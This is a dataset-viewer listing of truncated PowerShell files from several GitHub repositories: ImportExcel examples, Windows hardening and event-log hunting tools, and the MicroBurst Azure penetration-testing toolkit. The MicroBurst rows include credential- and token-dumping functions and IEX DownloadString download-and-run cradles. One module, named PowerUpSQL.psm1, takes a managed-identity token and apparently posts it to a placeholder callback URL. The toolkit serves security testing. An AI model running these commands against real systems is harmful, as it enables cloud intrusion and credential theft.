source stringclasses 1
value | repo stringclasses 33
values | repo_url stringclasses 33
values | path stringlengths 7 179 | language stringclasses 1
value | license stringclasses 4
values | stars int64 2.27k 53.4k | ref stringclasses 4
values | size_bytes int64 48 259k | text stringlengths 48 259k |
|---|---|---|---|---|---|---|---|---|---|
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/CustomReporting/CustomReport.ps1 | PowerShell | apache-2.0 | 2,711 | master | 3,390 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
#Get rid of pre-exisiting sheet
$xlSourcefile = "$env:TEMP\ImportExcelExample.xlsx"
Write-Verbose -Verbose -Message "Save location: $xlSourcefile"
Remove-Item $xlSourcefile -ErrorAction Ignore
$data = @"
From,To,RDollars,RPercent,MDollar... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/OpenExcelPackage/EnableFeatures.ps1 | PowerShell | apache-2.0 | 2,711 | master | 753 | # How to use Enable-ExcelAutoFilter and Enable-ExcelAutofit
try { Import-Module $PSScriptRoot\..\..\ImportExcel.psd1 } catch { throw ; return }
$data = ConvertFrom-Csv @"
RegionInfo,StateInfo,Units,Price
West,Texas,927,923.71
North,Tennessee,466,770.67
East,Florida,520,458.68
East,Maine,828,661.24
West,Virginia,465,0... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/Import-Excel/ImportMultipleSheetsAsArray.ps1 | PowerShell | apache-2.0 | 2,711 | master | 193 | Import-Module $PSScriptRoot\..\..\ImportExcel.psd1 -Force
$xlfile = "$PSScriptRoot\yearlySales.xlsx"
$result = Import-Excel -Path $xlfile -WorksheetName * -Raw
$result | Measure-Object |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/Import-Excel/ImportMultipleSheetsAsHashtable.ps1 | PowerShell | apache-2.0 | 2,711 | master | 215 | Import-Module $PSScriptRoot\..\..\ImportExcel.psd1 -Force
$xlfile = "$PSScriptRoot\yearlySales.xlsx"
$result = Import-Excel -Path $xlfile -WorksheetName *
foreach ($sheet in $result.Values) {
$sheet
} |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/NumberFormat/CurrencyFormat.ps1 | PowerShell | apache-2.0 | 2,711 | master | 474 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
$file = "$env:temp\disks.xlsx"
Remove-Item $file -ErrorAction Ignore
$data = $(
New-PSItem 100 -100
New-PSItem 1 -1
New-PSItem 1.2 -1.1
New-PSItem -3.2 -4.1
New-PSItem -5.2 6.1
New-PSItem 1000 -2000
)
#Number form... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/NumberFormat/PercentagFormat.ps1 | PowerShell | apache-2.0 | 2,711 | master | 363 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
$file = "disks.xlsx"
Remove-Item $file -ErrorAction Ignore
$data = $(
New-PSItem 1
New-PSItem .5
New-PSItem .3
New-PSItem .41
New-PSItem .2
New-PSItem -.12
)
$data | Export-Excel -Path $file -Show -AutoSize -Numb... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/NumberFormat/ColorizeNumbers.ps1 | PowerShell | apache-2.0 | 2,711 | master | 499 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
$file = "$env:TEMP\disks.xlsx"
Remove-Item $file -ErrorAction Ignore
$data = $(
New-PSItem 100 -100
New-PSItem 1 -1
New-PSItem 1.2 -1.1
New-PSItem -3.2 -4.1
New-PSItem -5.2 6.1
)
#Set the numbers throughout the sheet ... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/NumberFormat/Win32LogicalDisk.ps1 | PowerShell | apache-2.0 | 2,711 | master | 325 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
$file = "disks.xlsx"
Remove-Item $file -ErrorAction Ignore
Get-CimInstance win32_logicaldisk -filter "drivetype=3" |
Select-Object DeviceID,Volumename,Size,Freespace |
Export-Excel -Path $file -Show -AutoSize -NumberFormat "0" |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/NumberFormat/PosNegNumbers.ps1 | PowerShell | apache-2.0 | 2,711 | master | 311 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
$file = "disks.xlsx"
Remove-Item $file -ErrorAction Ignore
$data = $(
New-PSItem 100 -100
New-PSItem 1 -1
New-PSItem 1.2 -1.1
)
$data | Export-Excel -Path $file -Show -AutoSize -NumberFormat "0.#0;-0.#0" |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/NumberFormat/Win32LogicalDiskFormatted.ps1 | PowerShell | apache-2.0 | 2,711 | master | 307 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
$file = "disks.xlsx"
Remove-Item $file -ErrorAction Ignore
Get-CimInstance win32_logicaldisk -filter "drivetype=3" |
Select-Object DeviceID,Volumename,Size,Freespace |
Export-Excel -Path $file -Show -AutoSize |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/Fibonacci/ShowFibonacci.ps1 | PowerShell | apache-2.0 | 2,711 | master | 540 | param ($fibonacciDigits=10)
try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
#Get rid of pre-exisiting sheet
$xlSourcefile = "$env:TEMP\ImportExcelExample.xlsx"
Write-Verbose -Verbose -Message "Save location: $xlSourcefile"
Remove-Item $xlSourcefile -ErrorAction Ignore
$(
New-PSIt... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/ImportByColumns/import-by-columns.ps1 | PowerShell | apache-2.0 | 2,711 | master | 6,317 | function Import-ByColumns {
<#
.synopsis
Works like Import-Excel but with data in columns instead of the conventional rows.
.Description.
Import-excel will read the sample file in this folder like this
> Import-excel FruitCity.xlsx | ft *
GroupAs Apple Orange Banana
... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/ImportHtml/PeriodicElements.ps1 | PowerShell | apache-2.0 | 2,711 | master | 138 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
Import-Html "http://www.science.co.il/PTelements.asp" 1 |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/ImportHtml/StarTrek.ps1 | PowerShell | apache-2.0 | 2,711 | master | 176 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
Import-Html "https://en.wikipedia.org/wiki/List_of_Star_Trek:_The_Original_Series_episodes" 2 |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Examples/ImportHtml/DemoGraphics.ps1 | PowerShell | apache-2.0 | 2,711 | master | 151 | try {Import-Module $PSScriptRoot\..\..\ImportExcel.psd1} catch {throw ; return}
Import-Html "http://en.wikipedia.org/wiki/Demographics_of_India" 4 |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | spikes/ConvertFrom-ExcelColumnName.ps1 | PowerShell | apache-2.0 | 2,711 | master | 342 | function ConvertFrom-ExcelColumnName {
param($columnName)
$sum=0
$columnName.ToCharArray() |
ForEach-Object {
$sum*=26
$sum+=[char]$_.tostring().toupper()-[char]'A'+1
}
$sum
}
ConvertFrom-ExcelColumnName p
ConvertFrom-ExcelColumnName ah
ConvertFrom-ExcelColumnNa... |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | en/Strings.psd1 | PowerShell | apache-2.0 | 2,711 | master | 273 | ConvertFrom-StringData @'
SystemDrawingAvailable=System.Drawing could not be loaded. Color and font look-ups may not be available.
PS5NeededForPlot=PowerShell 5 is required for plot.ps1
ModuleReadyExceptPlot=The ImportExcel module is ready, except for that functionality
'@ |
github | dfinke/ImportExcel | https://github.com/dfinke/ImportExcel | Charting/Charting.ps1 | PowerShell | apache-2.0 | 2,711 | master | 3,142 | function DoChart {
param(
$targetData,
$title,
[OfficeOpenXml.Drawing.Chart.eChartType]$ChartType,
[Switch]$NoLegend,
[Switch]$ShowCategory,
[Switch]$ShowPercent
)
if($targetData[0] -is [System.ValueType]) {
$chart = New-ExcelChartDefinition -YRang... |
github | 0x6d69636b/windows_hardening | https://github.com/0x6d69636b/windows_hardening | HardeningKitty.psm1 | PowerShell | mit | 2,614 | master | 150,963 | Function Invoke-HardeningKitty {
<#
.SYNOPSIS
Invoke-HardeningKitty - Checks and hardens your Windows configuration
=^._.^=
_( )/ HardeningKitty
Author: Michael Schneider
License: MIT
Required Dependencies: None
Optional Dependencies: None
... |
github | 0x6d69636b/windows_hardening | https://github.com/0x6d69636b/windows_hardening | HardeningKitty.psd1 | PowerShell | mit | 2,614 | master | 4,361 | #
# Module manifest for module 'HardeningKitty'
# Generated by: Michael Schneider
# Generated on: 2024-12-23
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'HardeningKitty.psm1'
# Version number of this module.
ModuleVersion = '0.9.4'
# Supported PSEditio... |
github | sans-blue-team/DeepBlueCLI | https://github.com/sans-blue-team/DeepBlueCLI | DeepBlueHash-collector.ps1 | PowerShell | gpl-3.0 | 2,403 | master | 2,885 | $hashdirectory=".\hashes\"
$events = get-winevent @{logname="Microsoft-Windows-Sysmon/Operational";id=1,6,7,29}
ForEach ($event in $events) {
if ($event.id -eq 1){ # Process creation
if ($event.Properties.Count -le 16){
$path=$event.Properties[3].Value # Full path of the file
$hash=$event.Propert... |
github | sans-blue-team/DeepBlueCLI | https://github.com/sans-blue-team/DeepBlueCLI | DeepBlue.ps1 | PowerShell | gpl-3.0 | 2,403 | master | 41,139 | <#
.SYNOPSIS
A PowerShell module for hunt teaming via Windows event logs
.DESCRIPTION
DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell.
.Example
Process local Windows security event log... |
github | sans-blue-team/DeepBlueCLI | https://github.com/sans-blue-team/DeepBlueCLI | DeepBlueHash-checker.ps1 | PowerShell | gpl-3.0 | 2,403 | master | 2,725 | # Requires VirusTotalAnalyzer: https://github.com/EvotecIT/VirusTotalAnalyzer
#
# Plus a (free) VirusTotal API Key: https://www.virustotal.com/en/documentation/public-api/
#
Import-Module VirusTotalAnalyzer -Force
# API KEY can be found once you register to Virus Total service (it's free)
$VTApi = '<Your API Key>'
$h... |
github | sans-blue-team/DeepBlueCLI | https://github.com/sans-blue-team/DeepBlueCLI | t/runall.ps1 | PowerShell | gpl-3.0 | 2,403 | master | 169 | Write-Host "Running DeepBlue.ps1 on all EVTX files to identify any syntax errors."
cd .. ; gci -path . -recurse -name "*.evtx" | % {.\DeepBlue.ps1 -File $_ | Out-Null } |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | MicroBurst.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 1,648 | # Test to see if each module is installed, load scripts as applicable
$prefBackup = $WarningPreference
$global:WarningPreference = 'SilentlyContinue'
# Az
try{
Get-InstalledModule -ErrorAction Stop -Name Az | Out-Null
Import-Module Az -ErrorAction Stop
Import-Module $PSScriptRoot\Az\MicroBurst-Az.psm1
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Invoke-EnumerateAzureSubDomains.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 10,825 | <#
File: Invoke-EnumerateAzureSubDomains.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2018 & Renos Nikolaou (@r3n_hat) - 2025
Description: PowerShell functions for enumerating Azure/Microsoft hosted resources.
Parts of the Permutations.txt file borrowed from - https://github.com/brianwarehime/inSp3ct... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/KeyVaultRunBook.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 3,742 | $ErrorActionPreference = "SilentlyContinue"
# Start RunAs Process
$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
# Connect AzureRM
Connect-AzureRmAccount -ServicePrincipal -Tenant $servicePrincipalConnection.TenantId -ApplicationId $servicePr... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/OwnerPersist-POST.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 492 | # PowerShell code to POST to the automation runbook for adding a new AzureAD user with Owner rights on the current subscription
# Change the URI, Username, and Password for your appropriate values
$uri = "https://s15events.azure-automation.net/webhooks?token=[REPLACE WITH YOUR WEBHOOK]"
$AccountInfo = @(@{RequestBody... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Invoke-DscVmExtension.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 6,118 | <#
File: Invoke-DscVmExtension.ps1
Author: Jake Karnes (@jakekarnes42), NetSPI - 2021
Description: PowerShell function for deploying DSC configurations hosted at any publicly accessible URL
#>
Function Invoke-DscVmExtension
{
<#
.SYNOPSIS
PowerShell function for executing prepackaged DSC config... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/AutomationRunbook-OwnerPersist.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 2,045 | param
(
[Parameter (Mandatory = $false)]
[object] $WebhookData
)
import-module AzureAD
# Get Azure Run As Connection Name
$connectionName = "AzureRunAsConnection"
# Get the Service Principal connection details for the Connection name
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionNam... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Get-AzAppConfiguration.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 3,450 | <#
File: Get-AzAppConfiguration.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2022
Description: PowerShell function for dumping Azure App Configuration key values using the access keys.
Signing Code reused from - https://learn.microsoft.com/en-us/azure/azure-app-configuration/rest-api-authentication-... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Get-AzAutomationCustomModules.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 8,274 | <#
File: Get-AzAutomationCustomModules.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2024
Description: PowerShell function for listing custom Automation Account packages using the Az PowerShell CMDlets.
#>
function Get-AzAutomationCustomModules {
<#
.SYNOPSIS
PowerShell function for li... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Get-AzACR.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 1,811 | Function Get-AzACR
{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available Azure ACR container images, using Docker credentials and an ACR hostname. This might also work for other docker container registries.
# Output: "docker pull" commands to pull ... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Invoke-EnumerateAzureBlobs.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 10,411 | <#
File: Invoke-EnumerateAzureBlobs.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2018
Description: PowerShell function for enumerating public Azure Blob file resources.
Parts of the Permutations.txt file borrowed from - https://github.com/brianwarehime/inSp3ctor
#>
Function Invoke-EnumerateAzureBl... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Get-AzAppRegistrationManifest.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 2,773 | <#
File: Get-AzAppRegistrationManifest.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2021
Description: PowerShell functions for enumerating App Registration credentials from AAD manifests.
#>
# Check if the Az Module is installed and imported
if(!(Get-Module Az)){
try{Import-Module Az -ErrorAction S... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Get-AzureVMExtensionSettings.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 6,626 | <#
File: Get-AzureVMExtensionSettings.psm1
Author: Jake Karnes, NetSPI - 2020
Description: PowerShell function for dumping information from Azure VM Extension Settings
#>
Function Get-AzureVMExtensionSettings
{
<#
.SYNOPSIS
PowerShell function for dumping information from Azure VM Extension Settings
.DESCRIPTIO... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Get-AzureVMExtensionSettingsWireServer.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 22,665 | <#
File: Get-AzureVMExtensionSettingsWireServer.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2025
Description: PowerShell function for dumping and decrypting Azure VM Extension Settings via the WireServer endpoint
Original Research:
- "ChaosDB explained: Azure's Cosmos DB vulnerability walkthrough" by Ni... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/MicroBurst-Misc.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 230 |
Import-Module $PSScriptRoot\Invoke-EnumerateAzureBlobs.ps1
Import-Module $PSScriptRoot\Invoke-EnumerateAzureSubDomains.ps1
Import-Module $PSScriptRoot\Invoke-DscVmExtension.ps1
Write-Host "Imported Misc MicroBurst functions" |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Shortcuts/VirtualMachineManagedIdentity-Windows-vault.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 455 | # Usage - returns a Key Vault Scoped Managed Identity token for a Virtual Machine - IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Shortcuts/VirtualMachineManagedIdentity-vault.ps1")
(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/o... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Shortcuts/AppServicesManagedIdentity-vault.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 455 | # Usage - returns a Key Vault Scoped Managed Identity token for an App Service or Function App - IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Shortcuts/AppServicesManagedIdentity-vault.ps1")
(Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEA... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Shortcuts/AppServicesManagedIdentity-graph.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 465 | # Usage - returns a Microsoft Graph Scoped Managed Identity token for an App Service or Function App - IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Shortcuts/AppServicesManagedIdentity-graph.ps1")
(Invoke-RestMethod -Method Get -Headers @{"X-IDENTI... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Shortcuts/VirtualMachineManagedIdentity-Windows-graph.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 465 | # Usage - returns a Microsoft Graph Scoped Managed Identity token for a Virtual Machine - IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Shortcuts/VirtualMachineManagedIdentity-graph.ps1")
(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/iden... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Shortcuts/AppServicesManagedIdentity-management.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 466 | # Usage - returns a Management Scoped Managed Identity token for an App Service or Function App - IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Shortcuts/AppServicesManagedIdentity-management.ps1")
(Invoke-RestMethod -Method Get -Headers @{"X-IDENTI... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Shortcuts/VirtualMachineManagedIdentity-Windows-management.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 466 | # Usage - returns a Management Scoped Managed Identity token for a Virtual Machine - IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Shortcuts/VirtualMachineManagedIdentity-management.ps1")
(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/iden... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/LogicApps/Invoke-APIConnectionHijack.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 5,140 |
#This function will perform the following actions:
#Obtain the details for a target API Connection
#Plug those details and a specified Logic App definition into a suitable format for the Az PowerShell module
#Create a new Logic App and trigger it
#Poll the LA until it is finished and retrieve any output/errors
#Dele... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/DSC/ExportManagedIdentityToken.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 1,711 | #Check if there is an existing config. If this command completes successfully, bail out
$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
exit
}
[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
Node localhost
{
Settings
{
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/DSC/DSCHello.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 1,163 | #Check if there is an existing config. If this command completes successfully, bail out
$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
exit
}
[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
Node localhost
{
Settings
{
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/DSC/DeployDSCAgent.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 3,332 | #Check if there is an existing config. If this command completes successfully, bail out
$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
exit
}
[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
Node localhost
{
Settings
{
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/DSC/TokenFunctionApp.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 2,737 | <#
File: TokenFunctionApp.ps1
Author: Jake Karnes (@jakekarnes42), NetSPI - 2021
Description: A PowerShell function app which recieves a managed identity bearer token and checks its privileges
#>
using namespace System.Net
# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Misc/Packages/PowerShell/PowerUpSQL.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 1,047 | function a {
param(
[string] $callbackURL = "http://YOUR_URL_HERE/"
)
# Hide the warning output
$SuppressAzurePowerShellBreakingChangeWarnings = $true
# Connect as the System-Assigned Managed Identity
Connect-AzAccount -Identity | Out-Null
# Get a token
$AccessToken = Get-AzAccessToken
if ($AccessToken.Toke... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureAD/Get-AzureADDomainInfo.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 8,916 | <#
File: Get-AzureADDomainInfo.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
Description: PowerShell functions for enumerating information from AzureAD domains.
#>
# Check if the AzureAD Module is installed and imported
if(!(Get-Module AzureAD)){
try{Import-Module AzureAD -ErrorAction Stop}
... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | AzureAD/MicroBurst-AzureAD.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 177 |
Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {
Import-Module $_.FullName
}
Write-Host "Imported AzureAD MicroBurst functions" |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzArcCertificates.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 9,686 | <#
File: Get-AzArcCertificates.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2024
Description: PowerShell function for dumping Azure Managed Identity Certificates from Arc enrolled systems.
#>
Function Get-AzArcCertificates
{
<#
.SYNOPSIS
Dumps access tokens for any Azure Arc systems with a... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzPasswords.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 86,487 | <#
File: Get-AzPasswords.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
Description: PowerShell function for dumping Azure credentials using the Az PowerShell CMDlets.
#>
Function Get-AzPasswords
{
<#
.SYNOPSIS
Dumps all available credentials from an Azure subscription. Pipe to Out-Gri... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Invoke-AzUADeploymentScript.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 16,682 | <#
File: Invoke-AzUADeploymentScript.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2024
Description: PowerShell function for generating Azure User-Assigned Managed Identity tokens, using deployment scripts.
#>
Function Invoke-AzUADeploymentScript
{
<#
.SYNOPSIS
Enumerates and dumps access to... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzAutomationConnectionScope.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 22,565 | <#
File: Get-AzAutomationConnectionScope.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2022
Description: PowerShell function for gathering available Subscriptions and Key Vaults for Automation Account identities.
To Do (features/improvements):
- Convert runbook execution method to Test Pane for add... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzKeyVaultsAutomation.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 11,804 | <#
File: Get-AzKeyVaultsAutomation.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
Description: PowerShell function for dumping Azure Key Vault Keys and Secrets via Automation Accounts.
#>
Function Get-AzKeyVaultsAutomation
{
<#
.SYNOPSIS
Dumps all available Key Vault Keys/Secrets from a... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/MicroBurst-Az.psm1 | PowerShell | bsd-3-clause | 2,373 | master | 172 |
Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process {
Import-Module $_.FullName
}
Write-Host "Imported Az MicroBurst functions" |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzDomainInfo.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 39,287 | <#
File: Get-AzDomainInfo.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
Description: PowerShell functions for enumerating information from Azure domains.
#>
# To Do:
# Add Ctrl-C handling for skipping sections/storage accounts
# Apply NSGs to Public IPs and VMs to pre-map existing intern... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzBatchAccountData.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 11,126 | <#
File: Get-AzBatchAccountData.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2023
Description: PowerShell functions for dumping Azure Batch commands, environmental variables, etc.
#>
function Get-AzBatchAccountData{
<#
.SYNOPSIS
PowerShell function for dumping information from Azure Batch A... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Invoke-AzAppServicesKuduDebug.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 13,276 | <#
File: Invoke-AzAppServicesKuduDebug.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2024
Description: PowerShell function for running commands against a Windows Container App Services host, via the Kudu Debug Console (PowerShell or CMD) Shell
#>
Function Invoke-AzAppServicesKuduDebug {
<#
.SYNOPSIS... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzWebAppTokens.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 17,842 | <#
File: Get-AzWebAppTokens.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2025
Description: PowerShell function for extracting credentials from Azure App Services applications that have integrated Entra ID authentication.
Original Research: Abusing Delegated Permissions via Easy Auth by Cody Burkard - ... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzMachineLearningData.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 14,217 | <#
File: Get-AzMachineLearningData.ps1
Author: Christian Bortone (@xybytes) - 2025
Description: PowerShell functions for dumping Azure Machine Learning Workspace information.
#>
function Get-AzMachineLearningData {
<#
.SYNOPSIS
PowerShell function for dumping information from Azure Machine Lea... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Invoke-AzVMBulkCMD.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 6,651 | <#
File: Invoke-AzVMBulkCMD.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
Description: PowerShell function for running PowerShell scripts against multiple Azure VMs.
#>
Function Invoke-AzVMBulkCMD
{
<#
.SYNOPSIS
Runs a Powershell script against all (or select) VMs in a subscription/res... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzMachineLearningCredentials.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 11,779 | <#
File: Get-AzMachineLearningCredentials.ps1
Author: Karl Fosaaen (@kfosaaen), NetSPI - 2025
Description: PowerShell function for enumerating sensitive information from Azure Machine Learning (AML) workspaces and their Data Store configurations.
Based on this Talk - "[D24] Smoke and Mirrors: How ... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Invoke-AzAppServicesCMD.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 4,990 | <#
File: Invoke-AppServicesCMD.ps1
Author: Josh Magri (@passthehashbrwn), NetSPI - 2021
Description: PowerShell function for running commands against an App Services host
#>
Function Invoke-AzAppServicesCMD {
<#
.SYNOPSIS
Runs a command against an App Services host.
.DESCRIPTION
Th... |
github | NetSPI/MicroBurst | https://github.com/NetSPI/MicroBurst | Az/Get-AzLoadTestingData.ps1 | PowerShell | bsd-3-clause | 2,373 | master | 27,615 | <#
File: Get-AzLoadTestingData.ps1
